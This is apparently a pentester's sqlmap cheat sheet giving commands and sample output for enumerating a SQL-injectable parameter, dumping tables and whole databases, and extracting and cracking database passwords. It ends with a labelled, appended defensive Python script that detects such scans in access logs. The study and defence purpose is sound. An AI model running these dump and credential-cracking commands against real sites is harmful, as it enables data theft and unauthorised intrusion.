GET REQUESTS

BASIC ENUMERATION

INITIAL

sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba
 * the --banner retrieves the database version banner
 * the --current-user retrieves the current user name
 * the --current-db retrieves the current database name
 * the --is-dba checks whether the current user has DBA (administrator) rights

TABLE & DATA DUMPS (SINGLE TABLE)

sqlmap -u "http://www.example.com/?id=1" --tables -D testdb
 +---------------+
 | member        |
 | data          |
 | international |
 | users         |
 +---------------+
 * this is used after finding the current database name
 
#this dumps the full table contents
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb
 +----+--------+------------+
 | id | name   | surname    |
 +----+--------+------------+
 | 1  | luther | blisset    |
 | 2  | fluffy | bunny      |
 | 3  | wu     | ming       |
 | 4  | NULL   | nameisnull |
 +----+--------+------------+
 * used after the identification of tables
 * the --dump option is used to retrieve the contents of the specified table
 * the default dump format is .csv and the dump will be stored in
   /home/user/.local/share/sqlmap/output/ for further investigation
    - other formats include HTML or SQLite via --dump-format
    
#this dumps only the specified table columns
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname
 * the -C option is used to select specific columns

#this dumps only the specified table rows from the columns
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --start=2 --stop=3
 * the --start & --stop options are used to select a range of table rows
 * this cmd displays rows from the 2nd up to the 3rd entry

#conditional enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"
 * this uses the WHERE clause to filter for specifics

FULL DB DUMP (ALL TABLES)

sqlmap -u "http://www.example.com/?id=1" --dump-all -D {testDB} --exclude-sysdbs
 * all of the current database content will be retrieved
 * the --exclude-sysdbs option will skip the retrieval of content from 
   system databases, as it is usually of little interest for pentesters.

ADVANCED ENUMERATION

SEMI AUTOMATED

# retrieve the structure of all of the tables to have a complete overview of the database architecture
sqlmap -u "http://www.example.com/?id=1" --schema

#search for tables whose name matches a pattern
sqlmap -u "http://www.example.com/?id=1" --search -T user
 * the --search option is used to search for databases, tables, and columns of interest
    - it enables the attacker to search for identifier names by using the LIKE operator
 * --dump is incompatible with --search, so the two cannot be combined

sqlmap -u "http://www.example.com/?id=1" --search -C pass
 * the -C option can be used to filter the search based on specific column names
 
#retrieve credentials from tables in DB
sqlmap -u "http://www.example.com/?id=1" --dump -D master -T users
 * the -T option is used to specify a specific table
 * this cmd will automatically enumerate and crack passwords
    - sqlmap has automatic password hash cracking capabilities via a dictionary-based attack
    
#DB Users Password Enumeration and Cracking
sqlmap -u "http://www.example.com/?id=1" --passwords --batch
 * the --passwords option dumps the content of system tables containing database-specific credentials (e.g., connection credentials)

FULLY AUTOMATED ENUMERATION

In a fully automated enumeration, everything accessible will be retrieved, and the run will take a long time. Once complete, you will need to find the data of interest in the output files manually.

#AUTOMATED
sqlmap -u {targetSite:port}/?id=1 --batch --all
 * will automa(g)ically do the whole enumeration process on the target itself, and provide the entire enumeration details.
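Added example (not part of these notes): a small Python log analyser that shows what the enumeration runs above look like from the defender's side, run over constructed combined-format access-log lines. The IP addresses and the sqlmap User-Agent string are constructed (modelled on the tool's default), and the per-parameter burst threshold and SQL keyword list are assumptions to tune for a real application.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in combined log format (not real traffic; sqlmap UA modelled on its default).
SAMPLE_LOG = """\
203.0.113.9 - - [10/May/2024:10:00:01 +0000] "GET /?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/May/2024:10:00:02 +0000] "GET /?id=2 HTTP/1.1" 200 498 "-" "Mozilla/5.0"
198.51.100.7 - - [10/May/2024:10:01:00 +0000] "GET /?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.8 (https://sqlmap.org)"
198.51.100.7 - - [10/May/2024:10:01:00 +0000] "GET /?id=1%27 HTTP/1.1" 500 120 "-" "sqlmap/1.8 (https://sqlmap.org)"
198.51.100.7 - - [10/May/2024:10:01:01 +0000] "GET /?id=1%20AND%207821%3D7821 HTTP/1.1" 200 512 "-" "sqlmap/1.8 (https://sqlmap.org)"
198.51.100.7 - - [10/May/2024:10:01:01 +0000] "GET /?id=1%20AND%207821%3D7822 HTTP/1.1" 200 300 "-" "sqlmap/1.8 (https://sqlmap.org)"
192.0.2.55 - - [10/May/2024:10:02:00 +0000] "GET /?id=1 HTTP/1.1" 200 512 "-" "curl/8.0"
192.0.2.55 - - [10/May/2024:10:02:05 +0000] "GET /?id=1%20UNION%20SELECT%20NULL HTTP/1.1" 200 512 "-" "curl/8.0"
"""
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Coarse indicator of SQL syntax inside a decoded parameter value (assumed list; tune for your app).
SQL_TOKEN_RE = re.compile(r"(?i)(?:'|\"|--|/\*|\b(?:and|or|union|select|sleep|benchmark)\b)")

def parse_line(line):  # -> dict with ip, path, ua and decoded query params, or None if unparsable
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {"ip": m.group("ip"), "path": parts.path, "ua": m.group("ua"),
            "params": parse_qsl(parts.query, keep_blank_values=True)}

def analyze(log_text, burst_threshold=3):
    # Returns {client ip: sorted list of reasons it looks like sqlmap-style enumeration}.
    findings = defaultdict(set)
    values_seen = defaultdict(set)          # (ip, path, param) -> distinct values sent
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if "sqlmap" in rec["ua"].lower():   # default UA: cheap signal, easily changed, never rely on it alone
            findings[rec["ip"]].add("sqlmap user-agent")
        for name, value in rec["params"]:
            if SQL_TOKEN_RE.search(value):
                findings[rec["ip"]].add(f"sql tokens in parameter '{name}'")
            values_seen[(rec["ip"], rec["path"], name)].add(value)
    # Enumeration (--banner, --dump, --all, ...) hammers one parameter with many variant values.
    for (ip, path, name), vals in values_seen.items():
        if len(vals) >= burst_threshold:
            findings[ip].add(f"{len(vals)} distinct values for '{name}' on {path}")
    return {ip: sorted(reasons) for ip, reasons in findings.items()}
```

The benign client with two ordinary id values produces no finding, while the sqlmap client trips all three checks and the curl client only the keyword check.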
